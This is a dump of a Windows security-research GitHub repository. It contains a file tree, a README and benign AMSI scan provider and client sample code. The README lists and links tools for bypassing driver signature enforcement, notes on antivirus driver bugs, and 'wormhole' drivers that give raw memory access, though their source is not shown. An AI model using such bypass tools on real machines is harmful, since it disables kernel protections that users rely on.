├── LICENSE ├── README.md ├── bin ├── ApiSetSchemaView.exe ├── DSEPatch.exe ├── DrvTools │ ├── DrvTools32.exe │ └── DrvTools64.exe ├── ROS │ ├── win32u.dll │ └── win32u_checked.dll ├── StripDebug.exe └── wdextract │ ├── wdextract.exe │ └── zlibwapi.dll ├── docs └── VIRLIST_UTF8.txt └── source ├── AMSI ├── AmsiProviderATL │ ├── AmsiClient │ │ ├── AmsiClient.cpp │ │ ├── AmsiClient.vcxproj │ │ ├── AmsiClient.vcxproj.filters │ │ ├── AmsiClient.vcxproj.user │ │ ├── pch.cpp │ │ └── pch.h │ ├── AmsiScan.sln │ └── AmsiServer │ │ ├── AmsiScan │ │ ├── AmsiProvider.cpp │ │ ├── AmsiProvider.h │ │ ├── AmsiProvider.rgs │ │ ├── AmsiScan.cpp │ │ ├── AmsiScan.def │ │ ├── AmsiScan.idl │ │ ├── AmsiScan.rc │ │ ├── AmsiScan.rgs │ │ ├── AmsiScan.vcxproj │ │ ├── AmsiScan.vcxproj.filters │ │ ├── AmsiScan.vcxproj.user │ │ ├── AmsiScan_i.c │ │ ├── AmsiScan_i.h │ │ ├── AmsiScan_p.c │ │ ├── AmsiScanps.def │ │ ├── dlldata.c │ │ ├── dllmain.cpp │ │ ├── dllmain.h │ │ ├── resource.h │ │ ├── stdafx.cpp │ │ ├── stdafx.h │ │ └── targetver.h │ │ └── AmsiScanPS │ │ ├── AmsiScanPS.vcxproj │ │ ├── AmsiScanPS.vcxproj.filters │ │ └── AmsiScanPS.vcxproj.user └── AmsiProviderC │ ├── AmsiProviderServer.sln │ └── AmsiProviderServer │ ├── AmsiProviderServer.vcxproj │ ├── AmsiProviderServer.vcxproj.filters │ ├── AmsiProviderServer.vcxproj.user │ ├── classfactory.c │ ├── classfactory.h │ ├── exports.def │ ├── global.h │ ├── main.c │ └── minirtl │ ├── _strcat.c │ ├── _strcpy.c │ ├── _strend.c │ ├── _strlen.c │ ├── minirtl.h │ ├── rtltypes.h │ ├── u64tohex.c │ └── ultohex.c ├── ApiSetSchema ├── 1.manifest ├── ApiSetSchemaView.sln ├── ApiSetSchemaView.vcxproj ├── ApiSetSchemaView.vcxproj.filters ├── ApiSetSchemaView.vcxproj.user ├── Resource.rc ├── apisetx.h ├── icon_gears.ico ├── main.c ├── minirtl │ ├── _strcat.c │ ├── _strcmpi.c │ ├── _strcpy.c │ ├── _strend.c │ ├── _strlen.c │ ├── _strncmpi.c │ ├── _strncpy.c │ ├── _strstr.c │ ├── minirtl.h │ ├── rtltypes.h │ └── ultostr.c ├── ntos.h ├── resource.h ├── treelist.c └── treelist.h ├── DSEPatch ├── DSEPatch.sln ├── DSEPatch │ ├── DSEPatch.vcxproj │ ├── DSEPatch.vcxproj.filters │ ├── DSEPatch.vcxproj.user │ ├── cui │ │ ├── cui.c │ │ └── cui.h │ ├── global.h │ ├── hde │ │ ├── hde64.c │ │ ├── hde64.h │ │ ├── pstdint.h │ │ └── table64.h │ ├── instdrv.c │ ├── instdrv.h │ ├── main.c │ ├── minirtl │ │ ├── _strcat.c │ │ ├── _strcmp.c │ │ ├── _strcmpi.c │ │ ├── _strcpy.c │ │ ├── _strend.c │ │ ├── _strlen.c │ │ ├── _strncmp.c │ │ ├── _strncmpi.c │ │ ├── _strncpy.c │ │ ├── cmdline.c │ │ ├── cmdline.h │ │ ├── minirtl.h │ │ ├── rtltypes.h │ │ ├── u64tohex.c │ │ ├── u64tostr.c │ │ ├── ultohex.c │ │ └── ultostr.c │ ├── ntdll │ │ └── ntos.h │ ├── resource.h │ ├── resource.rc │ ├── se_patterns.h │ ├── sup.c │ ├── sup.h │ ├── vbox.h │ └── vboxdrv.h ├── README.md └── changelog.txt ├── DrvTools ├── readme.txt └── src │ ├── DrvTools.ico │ ├── DrvTools.lpi │ ├── DrvTools.lpr │ ├── DrvTools.lps │ ├── DrvTools.res │ ├── link.res │ ├── nativesup.pas │ ├── ntstatus.inc │ ├── ppas.bat │ ├── rsrc │ ├── about64.ico │ └── main.ico │ ├── scmsup.pas │ ├── unit1.lfm │ └── unit1.pas ├── IntelNal ├── COPYING ├── Kconfig ├── Makefile ├── README.md ├── inc │ ├── cardbus_t.h │ ├── files.txt │ ├── hwbus_t.h │ ├── linux │ │ ├── files.txt │ │ ├── linuxdriverdevice_i.h │ │ ├── linuxnaldriver.h │ │ ├── linuxnalioctl.h │ │ ├── linuxos_i.h │ │ └── linuxpci_i.h │ ├── nal.h │ ├── nalcodes.h │ ├── nalioctl.h │ ├── naltypes.h │ ├── os_i.h │ ├── osdevice_i.h │ ├── pci_i.h │ └── pci_t.h └── src │ ├── files.txt │ ├── iqvlinux.spec │ ├── linuxdriverdevice_i.c │ ├── linuxdriveros_i.c │ ├── linuxdriverpci_i.c │ ├── linuxnaldriver.c │ ├── nalinstall │ └── nalioctldrv.c ├── ROS ├── srvany2 │ ├── srvany2.sln │ └── srvany2 │ │ ├── main.c │ │ ├── minirtl │ │ ├── _strcat.c │ │ ├── _strcpy.c │ │ ├── _strlen.c │ │ ├── cmdline.c │ │ ├── cmdline.h │ │ ├── minirtl.h │ │ └── rtltypes.h │ │ ├── srvany2.vcxproj │ │ ├── srvany2.vcxproj.filters │ │ └── srvany2.vcxproj.user └── win32u │ ├── win32u.sln │ └── win32u │ ├── main.c │ ├── resource.h │ ├── ver.rc │ ├── w32kcall.h │ ├── w32kcall_checked.h │ ├── w32parguments.h │ ├── w32parguments_checked.h │ ├── win32u.vcxproj │ ├── win32u.vcxproj.filters │ ├── win32u.vcxproj.user │ ├── win32u_export.def │ └── win32u_export_checked.def ├── SecTrash ├── asusgio2.c ├── bkavsp.c ├── enetech.c ├── glckio2.c ├── iobit_winring0.c ├── iobitcallbacks.c ├── logitech.c ├── maxproc64.c ├── readme.txt ├── secureaplus.c └── superantispyware.c ├── StripDebug ├── StripDebug.sln ├── StripDebug.vcxproj ├── StripDebug.vcxproj.filters ├── StripDebug.vcxproj.user ├── cui.c ├── cui.h ├── global.h ├── main.c └── minirtl │ ├── _strcat.c │ ├── _strcpy.c │ ├── _strlen.c │ ├── cmdline.c │ ├── cmdline.h │ ├── minirtl.h │ └── rtltypes.h ├── WormholeDrivers ├── INPOUT │ ├── HWInterfaceDrv.sln │ ├── HWInterfaceDrv.vcproj │ ├── MAKEFILE │ ├── ReadMe.txt │ ├── SOURCES │ ├── hwinterfacedrv.c │ ├── hwinterfacedrv.h │ ├── hwinterfacedrv.rc │ └── license.txt ├── MAPMEM │ ├── DIRS │ ├── EXE │ │ ├── MAKEFILE │ │ ├── MAPTEST.C │ │ ├── MAPTEST.MAK │ │ └── SOURCES │ ├── README.TXT │ └── SYS │ │ ├── MAKEFILE │ │ ├── MAPMEM.C │ │ ├── MAPMEM.H │ │ ├── MAPMEM.INI │ │ └── SOURCES ├── PHYMEM │ ├── LICENSE │ ├── LICENSE.html │ ├── PCIFlt │ │ ├── DebugPrint.c │ │ ├── DebugPrint.h │ │ ├── PCIFilter.c │ │ ├── PCIFilter.h │ │ ├── PCIFlt.dsp │ │ ├── PCIFlt.dsw │ │ └── Release │ │ │ ├── PCIFilter.inf │ │ │ └── PCIFlt.sys │ └── PhyMem │ │ ├── driver │ │ ├── AccessBus.c │ │ ├── DebugPrint.c │ │ ├── DebugPrint.h │ │ ├── phymem.c │ │ ├── phymem.dsp │ │ ├── phymem.dsw │ │ └── phymem.h │ │ ├── pmdll │ │ ├── Release │ │ │ └── pmdll.lib │ │ ├── initdrv.cpp │ │ ├── phymem.h │ │ ├── pmdll.cpp │ │ ├── pmdll.dsp │ │ ├── pmdll.dsw │ │ └── pmdll.h │ │ └── test │ │ ├── pmdll.h │ │ ├── pmdll.lib │ │ ├── test.cpp │ │ ├── test.dsp │ │ └── test.dsw ├── WINIO │ ├── .gitignore │ ├── LICENSE │ ├── README.md │ ├── Samples │ │ ├── DumpPhys │ │ │ ├── DumpPhys.sln │ │ │ ├── DumpPhys.suo │ │ │ └── DumpPhys │ │ │ │ ├── DumpPhys.csproj │ │ │ │ ├── DumpPhys.manifest │ │ │ │ ├── Form1.Designer.cs │ │ │ │ ├── Form1.cs │ │ │ │ ├── Form1.resx │ │ │ │ ├── Program.cs │ │ │ │ └── Properties │ │ │ │ ├── AssemblyInfo.cs │ │ │ │ ├── Resources.Designer.cs │ │ │ │ ├── Resources.resx │ │ │ │ ├── Settings.Designer.cs │ │ │ │ └── Settings.settings │ │ └── DumpPort │ │ │ ├── DumpPort.sln │ │ │ ├── DumpPort.suo │ │ │ └── DumpPort │ │ │ ├── DumpPort.csproj │ │ │ ├── DumpPort.manifest │ │ │ ├── Form1.Designer.cs │ │ │ ├── Form1.cs │ │ │ ├── Form1.resx │ │ │ ├── Program.cs │ │ │ └── Properties │ │ │ ├── AssemblyInfo.cs │ │ │ ├── Resources.Designer.cs │ │ │ ├── Resources.resx │ │ │ ├── Settings.Designer.cs │ │ │ └── Settings.settings │ └── Source │ │ ├── Dll │ │ ├── InstDrv.cpp │ │ ├── Phys32.cpp │ │ ├── Phys32.h │ │ ├── Port32.cpp │ │ ├── Port32.h │ │ ├── WinIo.aps │ │ ├── WinIo.cpp │ │ ├── WinIo.def │ │ ├── WinIo.rc │ │ ├── WinIo.sln │ │ ├── WinIo.suo │ │ ├── WinIo.vcproj │ │ ├── resource.h │ │ └── winio.h │ │ └── Drv │ │ ├── MAKEFILE │ │ ├── SOURCES │ │ ├── WinIo.c │ │ └── winio_nt.h ├── WINRING0 │ ├── LICENSE │ ├── README.md │ ├── dll │ │ ├── Driver.cpp │ │ ├── Driver.h │ │ ├── OlsApi.cpp │ │ ├── OlsApi.def │ │ ├── OlsApi.h │ │ ├── OlsApiInit.h │ │ ├── OlsApiInitDef.h │ │ ├── OlsApiInitExt.h │ │ ├── OlsDef.h │ │ ├── OlsDll.cpp │ │ ├── OlsDll.h │ │ ├── OlsDll.rc │ │ ├── OlsIoctl.h │ │ ├── resource.h │ │ ├── stdafx.cpp │ │ ├── stdafx.h │ │ ├── sys │ │ │ ├── MAKEFILE │ │ │ ├── OpenLibSys.c │ │ │ ├── OpenLibSys.h │ │ │ ├── OpenLibSys.rc │ │ │ └── SOURCES │ │ └── vxd │ │ │ ├── Makefile │ │ │ ├── OpenLS.c │ │ │ ├── OpenLS.def │ │ │ ├── OpenLS.h │ │ │ ├── OpenLS.rc │ │ │ └── ctrl.asm │ └── drv │ │ ├── DriverApi.c │ │ ├── DriverApi.h │ │ ├── DriverIoCtl.h │ │ └── DriverManage.c └── readme.txt └── wdextract ├── README.md ├── wdextract.sln └── wdextract ├── pch.cpp ├── pch.h ├── wdextract.cpp ├── wdextract.vcxproj ├── wdextract.vcxproj.filters ├── wdextract.vcxproj.user ├── zconf.h ├── zlib.h └── zlibwapi.lib /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 - 2022 hfiref0x 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Misc 2 | 3 | ### Miscellaneous Code and Docs 4 | 5 | docs 6 | * docs (mostly for historical purposes) 7 | 8 | bin 9 | * compiled versions of the some tools listed below 10 | 11 | source\ApiSetSchemaView 12 | * Windows ApiSetSchema Viewer (V2, V4, V6) 13 | 14 | source\StripDebug 15 | * Removes debug information left by VisualStudio 2015+ 16 | 17 | source\AMSI 18 | * AMSI related experiments 19 | * sources\AMSI\AmsiProviderATL 20 | AMSI provider client/server written in C++ using ATL 21 | * sources\AMSI\AmsiProviderC 22 | AMSI provider server written in C (works with client from ATL version) 23 | 24 | source\IntelNal 25 | * Intel QV Linux kernel driver (upload for quick references) 26 | 27 | source\ROS 28 | * ReactOS related code 29 | * sources\ROS\win32u 30 | ReactOS win32u dll (0.4.10 - 0.4.14) 31 | * sources\ROS\srvany2 32 | Run application as service 33 | 34 | source\SecTrash 35 | * Various AV/Security bugs and related trash found in the beginning of 2020 36 | 37 | source\WormholeDrivers 38 | * Collection of "wormhole" open source drivers widely used by hardware vendors sometimes in unmodified state 39 | 40 | source\DSEPatch 41 | * DSE patch based on CI callbacks modification, see dsepatch\readme for more info 42 | 43 | source\wdextract (for a more advanced version visit https://github.com/hfiref0x/wdextract) 44 | * Extract Windows Defender database from vdm files and unpack it 45 | 46 | source\DrvTools 47 | * Auxiliary utility to work with Windows Drivers 48 | 49 | # Authors 50 | * (c) Daniloff & Co 51 | * (c) Intel QV authors 52 | * (c) PHYMEM, MAPMEM, WINIO, WINRING0 authors 53 | * (c) hfiref0x tools/source 2015 - 2023, hfiref0x 54 | -------------------------------------------------------------------------------- /bin/ApiSetSchemaView.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/bin/ApiSetSchemaView.exe -------------------------------------------------------------------------------- /bin/DSEPatch.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/bin/DSEPatch.exe -------------------------------------------------------------------------------- /bin/DrvTools/DrvTools32.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/bin/DrvTools/DrvTools32.exe -------------------------------------------------------------------------------- /bin/DrvTools/DrvTools64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/bin/DrvTools/DrvTools64.exe -------------------------------------------------------------------------------- /bin/ROS/win32u.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/bin/ROS/win32u.dll -------------------------------------------------------------------------------- /bin/ROS/win32u_checked.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/bin/ROS/win32u_checked.dll -------------------------------------------------------------------------------- /bin/StripDebug.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/bin/StripDebug.exe -------------------------------------------------------------------------------- /bin/wdextract/wdextract.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/bin/wdextract/wdextract.exe -------------------------------------------------------------------------------- /bin/wdextract/zlibwapi.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/bin/wdextract/zlibwapi.dll -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiClient/AmsiClient.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | #include 3 | #include 4 | 5 | #pragma comment(lib, "amsi.lib") 6 | 7 | int main() 8 | { 9 | std::cout << "Hello World!\n"; 10 | 11 | HRESULT hr = CoInitializeEx(0, COINIT_MULTITHREADED); 12 | 13 | if (!SUCCEEDED(hr)) { 14 | std::cout << "CoInitializeEx error = " << std::hex << hr << "\n"; 15 | return -1; 16 | } 17 | 18 | HAMSICONTEXT amsiContext = nullptr; 19 | 20 | hr = AmsiInitialize(L"Amsi Scanner", &amsiContext); 21 | if (!SUCCEEDED(hr)) { 22 | std::cout << "AmsiInitialize error = " << std::hex << hr << "\n"; 23 | return -2; 24 | } 25 | 26 | HAMSISESSION amsiSession = nullptr; 27 | hr = AmsiOpenSession(amsiContext, &amsiSession); 28 | if (!SUCCEEDED(hr)) { 29 | std::cout << "AmsiOpenSession error = " << std::hex << hr << "\n"; 30 | return -2; 31 | } 32 | 33 | UCHAR ScanBuffer[] = "Scanned buffer"; 34 | 35 | AMSI_RESULT ScanResult; 36 | hr = AmsiScanBuffer(amsiContext, ScanBuffer, sizeof(ScanBuffer), L"ScanContentName", amsiSession, &ScanResult); 37 | if (!SUCCEEDED(hr)) { 38 | std::cout << "AmsiScanBuffer error = " << std::hex << hr << "\n"; 39 | return -2; 40 | } 41 | 42 | if (AmsiResultIsMalware(ScanResult)) { 43 | std::cout << "Malware detected." << "\n"; 44 | } 45 | else { 46 | std::cout << "Not detected." << "\n"; 47 | } 48 | 49 | AmsiCloseSession(amsiContext, amsiSession); 50 | AmsiUninitialize(amsiContext); 51 | CoUninitialize(); 52 | } 53 | 54 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiClient/AmsiClient.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiClient/AmsiClient.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiClient/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiClient/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiScan.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.136 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AmsiScanServer", "AmsiServer\AmsiScan\AmsiScan.vcxproj", "{D131A205-F090-4CF5-8441-32074FE5398E}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AmsiScanPS", "AmsiServer\AmsiScanPS\AmsiScanPS.vcxproj", "{19E4CA54-321F-481D-A457-48C4E3F3E85C}" 9 | ProjectSection(ProjectDependencies) = postProject 10 | {D131A205-F090-4CF5-8441-32074FE5398E} = {D131A205-F090-4CF5-8441-32074FE5398E} 11 | EndProjectSection 12 | EndProject 13 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AmsiClient", "AmsiClient\AmsiClient.vcxproj", "{CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}" 14 | EndProject 15 | Global 16 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 17 | Debug|x64 = Debug|x64 18 | Debug|x86 = Debug|x86 19 | Release|x64 = Release|x64 20 | Release|x86 = Release|x86 21 | EndGlobalSection 22 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 23 | {D131A205-F090-4CF5-8441-32074FE5398E}.Debug|x64.ActiveCfg = Debug|x64 24 | {D131A205-F090-4CF5-8441-32074FE5398E}.Debug|x64.Build.0 = Debug|x64 25 | {D131A205-F090-4CF5-8441-32074FE5398E}.Debug|x86.ActiveCfg = Debug|Win32 26 | {D131A205-F090-4CF5-8441-32074FE5398E}.Debug|x86.Build.0 = Debug|Win32 27 | {D131A205-F090-4CF5-8441-32074FE5398E}.Release|x64.ActiveCfg = Release|x64 28 | {D131A205-F090-4CF5-8441-32074FE5398E}.Release|x64.Build.0 = Release|x64 29 | {D131A205-F090-4CF5-8441-32074FE5398E}.Release|x86.ActiveCfg = Release|Win32 30 | {D131A205-F090-4CF5-8441-32074FE5398E}.Release|x86.Build.0 = Release|Win32 31 | {19E4CA54-321F-481D-A457-48C4E3F3E85C}.Debug|x64.ActiveCfg = Debug|x64 32 | {19E4CA54-321F-481D-A457-48C4E3F3E85C}.Debug|x86.ActiveCfg = Debug|Win32 33 | {19E4CA54-321F-481D-A457-48C4E3F3E85C}.Release|x64.ActiveCfg = Release|x64 34 | {19E4CA54-321F-481D-A457-48C4E3F3E85C}.Release|x86.ActiveCfg = Release|Win32 35 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Debug|x64.ActiveCfg = Debug|x64 36 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Debug|x64.Build.0 = Debug|x64 37 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Debug|x86.ActiveCfg = Debug|Win32 38 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Debug|x86.Build.0 = Debug|Win32 39 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Release|x64.ActiveCfg = Release|x64 40 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Release|x64.Build.0 = Release|x64 41 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Release|x86.ActiveCfg = Release|Win32 42 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Release|x86.Build.0 = Release|Win32 43 | EndGlobalSection 44 | GlobalSection(SolutionProperties) = preSolution 45 | HideSolutionNode = FALSE 46 | EndGlobalSection 47 | GlobalSection(ExtensibilityGlobals) = postSolution 48 | SolutionGuid = {C3FB4B87-8F9C-4BDC-BE98-48B9ACE36E15} 49 | EndGlobalSection 50 | EndGlobal 51 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiProvider.h: -------------------------------------------------------------------------------- 1 | // AmsiProvider.h : Declaration of the CAmsiProvider 2 | 3 | #pragma once 4 | #include "resource.h" // main symbols 5 | 6 | 7 | 8 | #include "AmsiScan_i.h" 9 | #include 10 | 11 | 12 | #if defined(_WIN32_WCE) && !defined(_CE_DCOM) && !defined(_CE_ALLOW_SINGLE_THREADED_OBJECTS_IN_MTA) 13 | #error "Single-threaded COM objects are not properly supported on Windows CE platform, such as the Windows Mobile platforms that do not include full DCOM support. Define _CE_ALLOW_SINGLE_THREADED_OBJECTS_IN_MTA to force ATL to support creating single-thread COM object's and allow use of it's single-threaded COM object implementations. The threading model in your rgs file was set to 'Free' as that is the only threading model supported in non DCOM Windows CE platforms." 14 | #endif 15 | 16 | using namespace ATL; 17 | 18 | 19 | // CAmsiProvider 20 | 21 | class ATL_NO_VTABLE CAmsiProvider : 22 | public CComObjectRootEx, 23 | public CComCoClass, 24 | public IAntimalwareProvider 25 | { 26 | public: 27 | CAmsiProvider() 28 | { 29 | } 30 | 31 | DECLARE_REGISTRY_RESOURCEID(IDR_AMSIPROVIDER) 32 | 33 | 34 | BEGIN_COM_MAP(CAmsiProvider) 35 | COM_INTERFACE_ENTRY(IAntimalwareProvider) 36 | END_COM_MAP() 37 | 38 | 39 | 40 | DECLARE_PROTECT_FINAL_CONSTRUCT() 41 | 42 | HRESULT FinalConstruct() 43 | { 44 | return S_OK; 45 | } 46 | 47 | void FinalRelease() 48 | { 49 | } 50 | 51 | public: 52 | 53 | HRESULT STDMETHODCALLTYPE Scan( 54 | _In_ IAmsiStream *stream, 55 | _Out_ AMSI_RESULT *result); 56 | 57 | void STDMETHODCALLTYPE CloseSession( 58 | _In_ ULONGLONG session); 59 | 60 | HRESULT STDMETHODCALLTYPE DisplayName( 61 | _Outptr_ LPWSTR *displayName); 62 | 63 | }; 64 | 65 | OBJECT_ENTRY_AUTO(__uuidof(AmsiProvider), CAmsiProvider) 66 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiProvider.rgs: -------------------------------------------------------------------------------- 1 | HKCR 2 | { 3 | NoRemove CLSID 4 | { 5 | ForceRemove {1c0643e1-5b0a-4420-9b76-0de9264b4c59} = s 'AmsiProvider' 6 | { 7 | ForceRemove Programmable 8 | InprocServer32 = s '%MODULE%' 9 | { 10 | val ThreadingModel = s 'Both' 11 | } 12 | } 13 | } 14 | } 15 | 16 | HKLM 17 | { 18 | NoRemove SOFTWARE { 19 | NoRemove Microsoft { 20 | NoRemove AMSI { 21 | NoRemove Providers { 22 | ForceRemove {1c0643e1-5b0a-4420-9b76-0de9264b4c59} = s 'AmsiProvider' 23 | } 24 | } 25 | } 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.cpp: -------------------------------------------------------------------------------- 1 | // AmsiScan.cpp : Implementation of DLL Exports. 2 | 3 | 4 | #include "stdafx.h" 5 | #include "resource.h" 6 | #include "AmsiScan_i.h" 7 | #include "dllmain.h" 8 | 9 | 10 | using namespace ATL; 11 | 12 | // Used to determine whether the DLL can be unloaded by OLE. 13 | _Use_decl_annotations_ 14 | STDAPI DllCanUnloadNow(void) 15 | { 16 | return _AtlModule.DllCanUnloadNow(); 17 | } 18 | 19 | // Returns a class factory to create an object of the requested type. 20 | _Use_decl_annotations_ 21 | STDAPI DllGetClassObject(_In_ REFCLSID rclsid, _In_ REFIID riid, _Outptr_ LPVOID* ppv) 22 | { 23 | return _AtlModule.DllGetClassObject(rclsid, riid, ppv); 24 | } 25 | 26 | // DllRegisterServer - Adds entries to the system registry. 27 | _Use_decl_annotations_ 28 | STDAPI DllRegisterServer(void) 29 | { 30 | // registers object, typelib and all interfaces in typelib 31 | HRESULT hr = _AtlModule.DllRegisterServer(); 32 | return hr; 33 | } 34 | 35 | // DllUnregisterServer - Removes entries from the system registry. 36 | _Use_decl_annotations_ 37 | STDAPI DllUnregisterServer(void) 38 | { 39 | HRESULT hr = _AtlModule.DllUnregisterServer(); 40 | return hr; 41 | } 42 | 43 | // DllInstall - Adds/Removes entries to the system registry per user per machine. 44 | STDAPI DllInstall(BOOL bInstall, _In_opt_ LPCWSTR pszCmdLine) 45 | { 46 | HRESULT hr = E_FAIL; 47 | static const wchar_t szUserSwitch[] = L"user"; 48 | 49 | if (pszCmdLine != nullptr) 50 | { 51 | if (_wcsnicmp(pszCmdLine, szUserSwitch, _countof(szUserSwitch)) == 0) 52 | { 53 | ATL::AtlSetPerUserRegistration(true); 54 | } 55 | } 56 | 57 | if (bInstall) 58 | { 59 | hr = DllRegisterServer(); 60 | if (FAILED(hr)) 61 | { 62 | DllUnregisterServer(); 63 | } 64 | } 65 | else 66 | { 67 | hr = DllUnregisterServer(); 68 | } 69 | 70 | return hr; 71 | } 72 | 73 | 74 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.def: -------------------------------------------------------------------------------- 1 | ; AmsiScan.def : Declares the module parameters. 2 | 3 | LIBRARY 4 | 5 | EXPORTS 6 | DllCanUnloadNow PRIVATE 7 | DllGetClassObject PRIVATE 8 | DllRegisterServer PRIVATE 9 | DllUnregisterServer PRIVATE 10 | DllInstall PRIVATE 11 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.idl: -------------------------------------------------------------------------------- 1 | // AmsiScan.idl : IDL source for AmsiScan 2 | // 3 | 4 | // This file will be processed by the MIDL tool to 5 | // produce the type library (AmsiScan.tlb) and marshalling code. 6 | 7 | import "oaidl.idl"; 8 | import "ocidl.idl"; 9 | 10 | [ 11 | object, 12 | uuid(05025dfe-70d5-4b61-a55a-aa21585d4cb2), 13 | dual, 14 | nonextensible, 15 | pointer_default(unique) 16 | ] 17 | interface IAmsiProvider : IDispatch 18 | { 19 | }; 20 | [ 21 | uuid(508c88ef-ca97-4107-a022-6025892ef192), 22 | version(1.0), 23 | ] 24 | library AmsiScanLib 25 | { 26 | importlib("stdole2.tlb"); 27 | [ 28 | uuid(1c0643e1-5b0a-4420-9b76-0de9264b4c59) 29 | ] 30 | coclass AmsiProvider 31 | { 32 | [default] interface IAmsiProvider; 33 | }; 34 | }; 35 | 36 | import "shobjidl.idl"; 37 | -------------------------------------------------------------------------------- 